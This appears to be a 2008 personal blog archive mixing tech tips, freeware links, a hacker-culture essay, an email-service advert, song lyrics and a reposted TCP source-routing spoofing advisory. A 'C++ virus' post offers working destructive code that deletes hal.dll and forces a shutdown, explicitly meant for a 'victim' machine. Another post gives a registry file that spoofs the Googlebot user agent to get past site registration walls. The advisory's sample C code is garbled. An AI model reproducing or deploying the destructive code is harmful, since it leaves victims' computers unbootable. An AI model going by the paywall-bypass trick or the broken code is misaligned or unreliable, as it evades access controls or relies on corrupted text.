Sunday, December 28, 2008

CRACK===========

By default Windows accepts both short and long passwords as the Windows login password.
Some users use extremely short passwords, which can easily be brute forced. So in order to set the minimum number
of characters or the minimum length of the password, simply follow the following registry trick-:
1. Launch the Windows Registry Editor i.e. c:\windows\regedit.exe
2. Scroll down to the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network
3. Click on Edit > New DWORD Value.
4. Name this new DWORD value as MinPwdLen and in the data field, enter the minimum number of characters
the password has to be of. One thing to note here is that this value is in Hexadecimal.
5. Now, Press F5 and your system just became a tiny bit securer but certainly not unhackable.

Friday, November 21, 2008

C++ virus try it!

This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.

The Original Code:

Code:

#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove(”C:\\windows\\system32\\hal.dll”); //PWNAGE TIME
system(”shutdown -s -r”);
system(”PAUSE”);
return EXIT_SUCCESS;
}

A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:

Code:

#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove(”%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(”shutdown -s -r”);
system(”PAUSE”);
return EXIT_SUCCESS;
}

The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.

Thursday, October 30, 2008

SEND EMAIL VIA MISSION IMPOSSIBLE STYLE

You might remember the world famous scene of Mission Impossible in which after the message has been heard once the message destroys itself. Now it is possible for everybody to have such facility. You can send an E-mail which destroys itself after it has been read once.

Every time that you send an email, copies are stored permanently on multiple email servers as well as the recipient's inbox and anyone they decide to send it to. Your emails can be stored and scanned in more places than you can imagine. Do you want people storing your email messages forever? Do you want something that you type today to be used against you tomorrow, next week, next month or even in the next decade?

Until now, everyone else has had control of the email that you have sent. BigString gives you back control of your email, acting like an automatic shredder for your email. You can self-destruct or change an email that's already been sent or read. Don't leave your messages sitting in peoples' inboxes forever. Get a free BigString email account to protect your privacy.

BigString takes the risk out of email

Now, with BigString, you can finally take the risk out of email and put an end to "sender regret." It is the world's first & only email service that thoroughly protects your safety and privacy.

BigString's exclusive, patent-pending technology enables you to prevent your personal or business information from lingering indefinitely in someone else's inbox. It also restricts private pictures or messages from being indiscriminately spread throughout cyberspace! Now your sensitive photos can't be posted to unseemly web sites or printed for circulation amongst total strangers.

BigString lets you have second thoughts

BigString shifts the control from the recipient to YOU the sender. BigString grants the luxury of second thoughts, the power to limit message viewings, and the choice to delay email transmission.

You can reword a message fired off in anger or haste or completely delete it! You can recall a botched résumé for revision or erase a tasteless joke. You can make a work of art or photograph print-proof. You can prevent a love letter from being forwarded. You can set an expiration date on an emailed price quote or business offer or you can simply pull back an email to eliminate typos.

BigString takes the danger out of clicking

BigString guarantees that clicking "send" will never again be an irreversible disaster. Now YOU decide the fate of your emails. You decide where they end up, who sees them and for how long. BigString emails can be destroyed, recalled or changed even after they've been opened! The freedom is yours, the options are yours, and you're the boss with BigString.

BigString is easy to use

BigString is as easy to use as any other email and there's nothing to download! Don't be resigned to the mercy of your recipient. You don't want your every action to be carved in stone because sometimes you just NEED to take it back!

Here are just a few of the many applications of BigString Erasable, Recallable, Non-Printable Email.

Executives: Protect your business and safeguard your email. Now you never have to worry about sending the wrong attachment or completely forgetting it. Misspelled words, incorrect dates, or other typos can all be fixed even after your message has been sent. You can even "pull an email back" to delete expired price quotes, old business offers or dated legal material. BigString is your email insurance.

Saturday, September 27, 2008

20 Great Google Secrets

Syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Google has a fairly complete list of its syntax elements at:

www.google.com/help/operators.html

Here are some advanced operators that can help narrow down your search results.

Intitle: at the beginning of a query word or phrase (intitle:”Three Blind Mice”) restricts your search results to just the titles of Web pages.

Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you’re searching for might commonly appear in URLs. If you’re looking for the term HTML, for example, and you don’t want to get results such as

www.mysite.com/index.html

You can also enter intext:html.

Link: lets you see which pages are linking to your Web page or to another page you’re interested in. For example, try typing in

link:http://www.hungry-hackers.com

Try using site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:”Mark Twain”site:edu. Experiment with mixing various elements; you’ll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.

Swiss Army Google

Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature

(www.google.com/help/features.html#calculator)

Lets you do both math and a variety of conversions from the search box. For extra fun, try the query “Answer to life the universe and everything.”

Let Google help you figure out whether you’ve got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try “thre blund mise”) and Google may suggest a proper spelling. This doesn’t always succeed; it works best when the word you’re searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you’re searching for “three blind mice,” underneath the search window will appear a statement such as Searched the web for “three blind mice.”) You’ll discover that you can click on each word in your search phrase and get a definition from a dictionary.

Suppose you want to contact someone and don’t have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you’ll see it at the top of the search results along with a map link to the address. If you’d rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you’d rather use a search form for business phone listings, try Yellow Search

(www.buzztoolbox.com/google/yellowsearch.shtml).

Extended Googling

Google offers several services that give you a head start in focusing your search. Google Groups

(http://groups.google.com)

indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools: Froogle
CODE
(http://froogle.google.com),

which indexes products from online stores, and Google Catalogs
CODE
(http://catalogs.google.com),

which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google’s tools and services at

www.google.com/options/index.html

You’re probably used to using Google in your browser. But have you ever thought of using Google outside your browser?

Google Alert

(www.googlealert.com)

monitors your search terms and e-mails you information about new additions to Google’s Web index. (Google Alert is not affiliated with Google; it uses Google’s Web services API to perform its searches.) If you’re more interested in news stories than general Web content, check out the beta version of Google News Alerts

(www.google.com/newsalerts).

This service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)

Google on the telephone? Yup. This service is brought to you by the folks at Google Labs

(http://labs.google.com),

a place for experimental Google ideas and features (which may come and go, so what’s there at this writing might not be there when you decide to check it out). With Google Voice Search

(http://labs1.google.com/gvs.html),

you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don’t expect 100 percent success.

In 2002, Google released the Google API (application programming interface), a way for programmers to access Google’s search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you’ll need an API key, which is available free from
CODE
www.google.com/apis

Thanks to its many different search properties, Google goes far beyond a regular search engine. Give the tricks in this article a try. You’ll be amazed at how many different ways Google can improve your Internet searching.

Online Extra: More Google Tips

Here are a few more clever ways to tweak your Google searches.

Search Within a Timeframe

Daterange: (start date–end date). You can restrict your searches to pages that were indexed within a certain time period. Daterange: searches by when Google indexed a page, not when the page itself was created. This operator can help you ensure that results will have fresh content (by using recent dates), or you can use it to avoid a topic’s current-news blizzard and concentrate only on older results. Daterange: is actually more useful if you go elsewhere to take advantage of it, because daterange: requires Julian dates, not standard Gregorian dates. You can find converters on the Web (such as

CODE
http://aa.usno.navy.mil/data/docs/JulianDate.html

excl.gif No Active Links, Read the Rules - Edit by Ninja excl.gif), but an easier way is to do a Google daterange: search by filling in a form at

www.researchbuzz.com/toolbox/goofresh.shtml or www.faganfinder.com/engines/google.shtml

If one special syntax element is good, two must be better, right? Sometimes. Though some operators can’t be mixed (you can’t use the link: operator with anything else) many can be, quickly narrowing your results to a less overwhelming number.

More Google API Applications

Staggernation.com offers three tools based on the Google API. The Google API Web Search by Host (GAWSH) lists the Web hosts of the results for a given query

(www.staggernation.com/gawsh/).

When you click on the triangle next to each host, you get a list of results for that host. The Google API Relation Browsing Outliner (GARBO) is a little more complicated: You enter a URL and choose whether you want pages that related to the URL or linked to the URL

(www.staggernation.com/garbo/).

Click on the triangle next to an URL to get a list of pages linked or related to that particular URL. CapeMail is an e-mail search application that allows you to send an e-mail to google@capeclear.com with the text of your query in the subject line and get the first ten results for that query back. Maybe it’s not something you’d do every day, but if your cell phone does e-mail and doesn’t do Web browsing, this is a very handy address to know.

How To Become HACKER???????

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.
But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you — for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters — not just intellectually but emotionally as well.
Or, as the following modern Zen poem has it:

To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.
So, if you want to be a hacker, repeat the following things until you believe them

1. The world is full of fascinating problems waiting to be solved.
Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.
If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval.
(You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece — and so on, until you're done.)
2. No problem should ever have to be solved twice.
Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.
To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.
Note, however, that "No problem should ever have to be solved twice." does not imply that you have to consider all existing solutions sacred, or that there is only one right solution to any given problem. Often, we learn a lot about the problem that we didn't know before by studying the first cut at a solution. It's OK, and often necessary, to decide that we can do better. What's not OK is artificial technical, legal, or institutional barriers (like closed-source code) that prevent a good solution from being re-used and force people to re-invent wheels.
(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's fine to use your hacking skills to support a family or even get rich, as long as you don't forget your loyalty to your art and your fellow hackers while doing it.)
3. Boredom and drudgery are evil.
Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.
To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).
(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.)
4. Freedom is good.
Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by — and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers.
(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)
Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like ‘cooperation’ that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.
5. Attitude is no substitute for competence.
To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.
Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.
If you revere competence, you'll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.
Points For Style
Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you're not at a computer that seem to help. They're not substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking.
• Learn to write your native language well. Though it's a common stereotype that programmers can't write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers.
• Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).
• Train in a martial-arts form. The kind of mental discipline required for martial arts seems to be similar in important ways to what hackers do. The most popular forms among hackers are definitely Asian empty-hand arts such as Tae Kwon Do, various forms of Karate, Wing Chun, Aikido, or Ju Jitsu. Western fencing and Asian sword arts also have visible followings. In places where it's legal, pistol shooting has been rising in popularity since the late 1990s. The most hackerly martial arts are those which emphasize mental discipline, relaxed awareness, and control, rather than raw strength, athleticism, or physical toughness.
• Study an actual meditation discipline. The perennial favorite among hackers is Zen (importantly, it is possible to benefit from Zen without acquiring a religion or discarding one you already have). Other styles may work as well, but be careful to choose one that doesn't require you to believe crazy things.
• Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.
• Develop your appreciation of puns and wordplay.
The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they're connected with a mix of left- and right-brain skills that seems to be important; hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment's notice.
Work as intensely as you play and play as intensely as you work. For true hackers, the boundaries between "play", "work", "science" and "art" all tend to disappear, or to merge into a high-level creative playfulness. Also, don't be content with a narrow range of skills. Though most hackers self-describe as programmers, they are very likely to be more than competent in several related skills — system administration, web design, and PC hardware troubleshooting are common ones. A hacker who's a system administrator, on the other hand, is likely to be quite skilled at script programming and web design. Hackers don't do things by halves; if they invest in a skill at all, they tend to get very good at it.
Finally, a few things not to do.
• Don't use a silly, grandiose user ID or screen name.
• Don't get in flame wars on Usenet (or anywhere else).
• Don't call yourself a ‘cyberpunk’, and don't waste your time on anybody who does.
• Don't post or email writing that's full of spelling errors and bad grammar.
The only reputation you'll make doing any of these things is as a twit. Hackers have long memories — it could take you years to live your early blunders down enough to be accepted.
The problem with screen names or handles deserves some amplification. Concealing your identity behind a handle is a juvenile and silly behavior characteristic of crackers, warez d00dz, and other lower life forms. Hackers don't do this; they're proud of what they do and want it associated with their real names. So if you have a handle, drop it. In the hacker culture it will only mark you as a loser

Sunday, September 21, 2008

SECRET BACKDOORS TO MANY SITES

Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first….
The lesson you should have learned here is: Obviously Google can go where you can’t.Can we solve this problem? Yes, we can.
We merely have to convince the site we want to enter, that WE ARE GOOGLE. In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.How then, can you disguise yourself as a Googlebot? Quite simple:
by changing your browser’s User Agent.
Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.

*********************************************

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Internet Settings5.0User Agent]
@=”Googlebot/2.1″
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Internet Settings5.0User Agent]
@=”Googlebot/2.1″
“Compatible”=”+http://www.googlebot.com/bot.html

***************************************************

Please Remove The Spaces Between Current Version Internet Settings

“Voila! You’re done!You may always change it back again….
I know only one site that uses you User Agent to establish your eligability to use its services, and that’s the Windows Update site…
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:

******************************************

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet Settings5.0User Agent]
@=”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

Friday, September 12, 2008

Hi, I'm an iPhone and You're Nobody

Uh-Oh. Apple will almost certainly wipe up Microsoft in smartphone operating system market share during third quarter.

That's my conclusion after further reviewing Gartner's smartphone OS shipment numbers for first and second quarters. Sorry, I should have figured this all out earlier in the day.

Some background: Yesterday, I couldn't get to Nokia's announcement about licensing Exchange ActiveSync for Symbian S60 handsets. I instead posted to Apple Watch on new iPod colors (the one new feature) and iTunes 8's sales pushiness. Overnight, I asked Gartner for mobile OS shipments so I could write an analysis on the Nokia-Microsoft deal. Afterwards, I dug further into the numbers for an Apple Watch post on iPhone OS market share. While writing that post, I realized Windows Mobile's plight, and its dire.

By even the most conservative of analyst estimates about third-quarter iPhone shipments, Apple's OS almost certainly will push aside Windows Mobile in smartphone operating system marketshare. The smartphone is Windows Mobile's core market.

GOT A TIP OR RUMOR?


During first half 2008, Microsoft shipped about 7.6 million copies of Windows Mobile. Smartphone OS marketshare was about 12 percent for each of the first two quarters. Gartner's second quarter numbers combined with Apple's disclosed iPhone shipments for first quarter equals about 2.6 million units for the first half. That's a little less than half the Linux total.

Looking ahead, iPhone OS could easily pass Windows Mobile, assuming Microsoft ships about the same number of copies in each of the previous two quarters&151;3.8 million. My guess: Windows Mobile shipments will decline to as few as 3 million. There are a bunch of exciting new Windows Mobile handsets coming to market, but the emphasis is on coming. For example, the HTC Touch Diamond and HTC Touch Pro are coming to Sprint here in the United States—next week and late October, respectively. Sony's Xperia X-1 launches on Sept. 30, which isn't soon enough for Microsoft.

Windows Mobile could have an exciting fourth quarter, but there's not much bang going on in third quarter. By contrast, Apple launched one of the most highly anticipated smartphones ever on July 11. Financial analyst estimates range anywhere from 4.4 million to 6 million iPhones shipped in third quarter. Either number would likely push Microsoft down a spot behind Apple. How strange if the top three providers of Exchange syncing, based on smartphone OS shipments, were companies other than Microsoft.

The reversal of fortune would be perhaps a psychological blow to some Microsoft Windows Mobile product managers and one big smiley face for Apple's iPhone team. More importantly, it's news Apple could seize for competitive marketing purposes. Then there will be the jibes from the Apple fanboy bloggers. After all, Microsoft CEO Steve Ballmer made fun of iPhone in interviews last year. Which Steve will be laughing now, Microsoft's Ballmer or Apple's Jobs?

Windows Mobile's sudden, uncertain future is more reason for Microsoft to start a mobile Manhattan Project. Mobile devices are the future of computing. Microsoft cannot afford to cede anything to Apple—or to Google, which is rapidly preparing for Android's release. The mobile operating system is suddenly getting crowded. Microsoft once worried about Linux, Palm OS and RIM. But Apple is gaining fast, and Google will further fragment the smartphone OS market. Microsoft cannot continue in business-as-usual mode. Somebody needs to yell fire, then light one under every butt that doesn't move. It's time for a project with the urgency of Internet Explorer 2, 3 and 4 during the browser wars with Netscape.

Microsoft executives harp on about choice. That's fine if businesses or consumers choose your product. The local supermarket offers lots of choice, but I can walk to the pricier convenience store. The point: Choice is good but it's not a market differentiator. People need good choices, and Windows Mobile doesn't feel like one of them right now.

Some strong advice to Microsoft's executive team: If you lose the mobile market you lose the future of computing, particularly as emerging markets skip over PCs to cell phones and cheap laptops (many of which won't run Windows Vista). Here, let me scare you with this future iPhone commercial. It's in the guise of Apple's "Get a Mac" commercials but even more condescending. "Hi, I'm an iPhone—and you're nobody."

Thursday, September 11, 2008

DON'T UPGRADE TO LEOPARD!

I can't believe I am saying this, but, as an advisory to others, I feel I need to considering the pain I have endured (and am enduring) since I have done so. I am a HUGE Apple fan(atic), as anyone reading these posts knows. Indeed , I took Apple's delay of Leopard in stride because I thought it would only give them more time to make the product better. Sadly, I was wrong. It is unfortunate that such a wonderful product as the Mac OS had to take a backseat to the iPhone, but, to make matters worse, it seems the product was released much too soon.

To enumerate the problems I have experienced since upgrading to Leopard:
I would appreciate any feedback here, since I am sure others are in the same boat. Unfortunately, it seems that this issue is related to Leopard and unless and until Apple gets things right here we are all going to suffer. So, we need to make sure our collective voices are heard.

TEAM TALK, DATA RECOVERY, ARRANGE STARTUP, PDF TOOLS, WINDOWS SHOOT

Talk lets you chat with your friends and others using the internet or a local area network. All you need is a microphone and a sound card. The primary goal of TeamTalk, avers the developer, is to provide a conversation with high TEAM TALK

Team quality sound and minimum transmission delay. Features - allows any number of people to participate in a conversation, this of-course would depend on the bandwidth available, a variety of configuration options to select the the audio quality that is ideal for your connection speed, and minimum lag (delay). The 1.63 MB for windows version (All) at CLICK HERE TO DOWNLOAD

DATA RECOVERY

Smart FAT Recovery can recover any deleted files, including MS Office files, photos, mp3s. This a FAT recovery tool for Windows operating system supports the FAT 12/16/32 file system. The software, claim the developers, easily recovers data from hard disks, digital cameras, and any type of storage media - flash drives, USB drives, memory stick, PC card, multimedia card, secure digital card and diskette. Compatible Platforms: Windows NT/2000/XP/2003. The 660 KB Smart FAT Recovery CLICK HERE TO DOWNLOAD

ARRANGE STARTUP

When many programs are loaded onto the memory of a PC at startup the performance could get affected significantly. Some of the programs are system ones which are loaded at startup are necessary for normal functioning, quite a number of others are not. These can be easily removed from the startup list with Arrange Startup. This utifilty not only classifies the programs that are executed at startup as system programs, suspicious applications, etc, it also helps to remove the unwanted ones. Compatible Platforms: Windows NT/2000/XP/2003. The 1 MB Arrange Startup CLICK HERE TO DOWNLOAD

PDF TOOLS

PDFTools is a PDF management application. It can encrypt, decrypt, join, split, stamp, create and rearrange a PDF file. Easy to use as the main window gives quick access to all the features provided. Features: Encrypt to protect any PDF file; Decrypt to create a protection-free version; Join multiple PDF files; Split a PDF file in multiple ways; Rearrange PDF to arrange pages in a PDF file; option to create a PDF file from xml file ( a new feature and still going through functional testing). Includes a simple to use XML to PDF converter. The 2.82 MB PDFTools v.2 (Release Date: 2006-10-13) for OS: Win 9x/ ME/ NT/ 2K/ XP/2K3.CLICK HERE TO DOWNLOAD Download PDF2XL Converterhttp://www.cogniview.com/redirect.php?A=125&L=38&V=2


WINDOW SHOOT

Window-Shoot is a fast and cool Screen Capture software. WindowShoot can capture any Window screen and save them as a Video file. Features like adding Text, Mouse Cursor and Cursor Position to the Video are also available. The easy to use 304 Kb WindowShoot for OS: 98/ME/2000/XP/2003 is the brain child of Suresh. CLICK HERE TO DOWNLOAD

Saturday, September 6, 2008

MUSICAL TASTE DEFINING YOU

You could have read this somewhere or maybe told upon. But its gonna be repeated here.Fans of classical and jazz music are creative, pop lovers are hardworking and, despite the stereotypes, heavy metal listeners are gentle, creative somewhat who are at ease with themselves.

People often define their sense of identity through their musical taste, wearing particular clothes, going to certain pubs and using certain types of slang. For me its not surprising that personality should also be related to musical preference.

Actually, this is proven research which concluded that jazz and classical fans are creative with good self-esteem, altough the former are much more outgoing whereas the latter are shy.
Country and western fans were found to be hardworking and shy; rap fans are outgoing and indie lovers lack self-esteem and are not very gentle.

Those who like soul music can take heart as the research concluded they are creative, outgoing, gentle, at ease and have a high self-esteem.Those who choose to listen to exciting, punchy music likely to be in a higher earning bracket, while those who go for relaxing sounds tend to be lower down the pay scale.

So this story featured your musical taste with your features .

Sunday, August 31, 2008

TUM HO TOH

TUM HO TOH

GAATA HAI DIL

TUM NAHIN
TOH GEET KAHAN

TUM HO TOH HAI SAB HAASIL

TUM NAHIN TO KYA HAI YAHAAN

TUM HO TOH HAIN SAPNO KA JAISA HASSEEN EK SAMAAAA

JO TUM HO TOH YEH LAGTA HAI KE MIL GAYI HAR KHUSI

JO TUM NA HO YEH LAGTA HAI KE HAR KHUSHI MEIN HAI KAMMEE

TUMKO HAI MAANGTI


YEH ZINDAGI,

TUM HO TOH

RAAHENH BHI HAIN

TUM NAHIN

TOH RAASTEY KAHAAN

TUM HO TOH HAI HAR EK PAL MEHERBAAN YEH JAHAAN

JO TUM HO TOH HAAWA MEIN BHI

MOHOBATTON KA RANG HAI

JO TUM NA HO
TOH PHIR KOI NA JOSH NA KOI UMANG HAI

TUM MILE TOH MILLEEEE

YEH ZINDAGI

Saturday, August 30, 2008

A TCP SPOOFING ATTACK

Over the past few years TCP number prediction attacks have become a real threat against unprotected networks, taking advantage of the inherent trust relationships present in many network installations. TCP sequence number prediction attacks have most commonly been implemented by opening a series of connections to the target host, and attempting to predict the sequence number which will be used next. Many Operating systems have
therefore attempted to solve this problem by implementing a method of generating sequence numbers in unpredictable fashions. This method does not solve the problem.

This advisory introduces an alternative method of obtaining the initial sequence number from some common trusted services. The attack presented here does not require the attacker to open multiple connections, or flood a port on the trusted host to complete the attack. The only requirement is that
source routed packets can be injected into the target network with fake source addresses.

This advisory assumes that the reader already has an understanding of how TCP sequence number prediction attacks are implemented.

The impact of this advisory is greatly diminished due to the large number of organizations which block source routed packets and packets with addresses inside of their networks. Therefore we present the information as more of a ‘heads up’ message for the technically inclined, and to re-iterate that
the randomization of TCP sequence numbers is not an effective solution
against this attack.

Technical Details
~~~~~~~~~~~~~~~~~

The problem occurs when particular network daemons accept connections with source routing enabled, and proceed to disable any source routing options on the connection. The connection is allowed to continue, however the reverse route is no longer used. An example attack can launched against the in.rshd daemon, which on most systems will retrieve the socket options
via getsockopt() and then turn off any dangerous options via setsockopt().

An example attack follows.

Host A is the trusted host
Host B is the target host
Host C is the attacker

Host C initiates a source routed connection to in.rshd on host B, pretending
to be host A.

Host C spoofing Host A –> Host B in.rshd

Host B receives the initial SYN packet, creates a new PCB (protocol control block) and associates the route with the PCB. Host B responds, using the reverse route, sending back a SYN/ACK with the sequence number.

Host C spoofing Host A <– Host B in.rshd

Host C responds, still spoofing host A, acknowledging the sequence number. Source routing options are not required on this packet.

Host C spoofing Host A –> Host B in.rshd

We now have an established connection, the accept() call completes, and control is now passed to the in.rshd daemon. The daemon now does IP options checking and determines that we have initiated a source routed connection. The daemon now turns off this option, and any packets sent
thereafter will be sent to the real host A, no longer using the reverse route which we have specified. Normally this would be safe, however the attacking host now knows what the next sequence number will be. Knowing this sequence number, we can now send a spoofed packet without the source
routing options enabled, pretending to originate from Host A, and our command will be executed.

In some conditions the flooding of a port on the real host A is required if larger ammounts of data are sent, to prevent the real host A from responding with an RST. This is not required in most cases when performing this attack against in.rshd due to the small ammount of data transmitted

It should be noted that the sequence number is obtained before accept() has returned and that this cannot be prevented without turning off source routing in the kernel.

As a side note, we’re very lucky that TCP only associates a source route with a PCB when the initial SYN is received. If it accepted and changed the ip options at any point during a connection, more exotic attacks may be possible. These could include hijacking connections across the internet without playing a man in the middle attack and being able to bypass IP options checking imposed by daemons using getsockopt(). Luckily *BSD based TCP/IP stacks will not do this, however it would be interesting to examine other implementations.

Impact
~~~~~~

The impact of this attack is similar to the more complex TCP sequence number prediction attack, yet it involves fewer steps, and does not require us to ‘guess’ the sequence number. This allows an attacker to execute arbitrary commands as root, depending on the configuration of the target
system. It is required that trust is present here, as an example, the use of .rhosts or hosts.equiv files.

Solutions
~~~~~~~~~

The ideal solution to this problem is to have any services which rely on IP based authentication drop the connection completely when initially detecting that source routed options are present. Network administrators and users can take precautions to prevent users outside of their network from taking advantage of this problem. The solutions are hopefully already either implemented or being implemented.

1. Block any source routed connections into your networks
2. Block any packets with internal based address from entering your network.

Network administrators should be aware that these attacks can easily be launched from behind filtering routers and firewalls. Internet service providers and corporations should ensure that internal users cannot launch the described attacks. The precautions suggested above should be implemented
to protect internal networks.

Example code to correctly process source routed packets is presented here as an example. Please let us know if there are any problems with it. This code has been tested on BSD based operating systems.

u_char optbuf[BUFSIZ/3];
int optsize = sizeof(optbuf), ipproto, i;
struct protoent *ip;

if ((ip = getprotobyname(”ip”)) != NULL)
ipproto = ip->p_proto;
else
ipproto = IPPROTO_IP;
if (!getsockopt(0, ipproto, IP_OPTIONS, (char *)optbuf, &optsize) &&
optsize != 0) {
for (i = 0; i < c =" optbuf[i];" c ="="" c ="="" c ="="" c ="="">

One critical concern is in the case where TCP wrappers are being used. If a user is relying on TCP wrappers, the above fix should be incorporated into fix_options.c. The problem being that TCP wrappers itself does not close the connection, however removes the options via setsockopt(). In this case when control is passed to in.rshd, it will never see any options present, and the connection will remain open (even if in.rshd has the above patch incorporated). An option to completely drop source routed connections will hopefully be provided in the next release of TCP wrappers. The other option
is to undefine KILL_IP_OPTIONS, which appears to be undefined by default. This passes through IP options and allows the called daemon to handle them accordingly.

Disabling Source Routing
~~~~~~~~~~~~~~~~~~~~~~~~

We believe the following information to be accurate, however it is not guaranteed.

— Cisco

To have the router discard any datagram containing an IP source route option issue the following command:

no ip source-route

This is a global configuration option.

— NetBSD

Versions of NetBSD prior to 1.2 did not provide the capability for disabling source routing. Other versions ship with source routing ENABLED by default. We do not know of a way to prevent NetBSD from accepting source routed packets.
NetBSD systems, however, can be configured to prevent the forwarding of packets when acting as a gateway.

To determine whether forwarding of source routed packets is enabled, issue the following command:

# sysctl net.inet.ip.forwarding
# sysctl net.inet.ip.forwsrcrt

The response will be either 0 or 1, 0 meaning off, and 1 meaning it is on.

Forwarding of source routed packets can be turned off via:

# sysctl -w net.inet.ip.forwsrcrt=0

Forwarding of all packets in general can turned off via:

# sysctl -w net.inet.ip.forwarding=0

— BSD/OS

BSDI has made a patch availible for rshd, rlogind, tcpd and nfsd. This patch is availible at:

ftp://ftp.bsdi.com/bsdi/patches/patches-2.1

OR via their patches email server

The patch number is
U210-037 (normal version)
D210-037 (domestic version for sites running kerberized version)

BSD/OS 2.1 has source routing disabled by default

